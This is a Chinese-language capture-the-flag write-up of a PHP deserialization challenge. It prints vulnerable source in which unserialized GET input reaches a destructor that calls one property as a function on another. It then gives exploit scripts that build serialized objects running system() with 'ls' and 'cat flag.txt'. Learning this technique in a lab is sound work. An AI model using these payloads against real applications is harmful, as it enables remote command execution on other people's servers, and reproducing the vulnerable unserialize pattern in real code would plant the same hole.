[GWHT]ezphp（反序列化）

原题目应该是

[NPUCTF2020]ReadlezPHP - L0VEhzzz - 博客园

php源码

 <?php
#error_reporting(0);
show_source('index.php');
class Information
{
    public $nameA;
    public $nameB;
    public function __construct(){
        $this->nameA = "Y-m-d h:i:s";
        $this->nameB = "date";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB = $this->nameB;
        echo $nameB($nameA);
    }
}

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["input"]);
?> 

这道题还是利用了 $nameB($nameA)，如果nameB是一个函数nameA是一条命令那么就可以执行了

序列化源码

<?php
class Information
{
    public $nameA ;
    public $nameB;
    public function __construct(){
        $this->nameA = "phpinfo()";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB= $this->nameB;
        echo $nameB($nameA);
    }
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>

一开始尝试这个

虽然得到页面的函数，但是找不到flag

这道题发生了改变

所以尝试着读取网页目录

<?php
class Information
{
    public $nameA ;
    public $nameB;
    public function __construct(){
        $this->nameA = "ls";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB= $this->nameB;
        echo $nameB($nameA);
    }
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>

 出来flag的文件，

name要如何读取呢？

这也是让我感觉学到了！的一个点

就是按照相同的套路！

<?php
class Information
{
    public $nameA ;
    public $nameB;
    public function __construct(){
        $this->nameA = "cat flag.txt";
        $this->nameB = "system";
    }
    public function __destruct(){
        $nameA = $this->nameA;
        $nameB= $this->nameB;
        echo $nameB($nameA);
    }
}
// 序列化操作
$user = new Information(); #实例化
$str_ser = serialize($user);
echo "序列化结果为:\n";
var_dump($str_ser);
?>

用系统命令读取flag.txt

然后就是

拿到了flag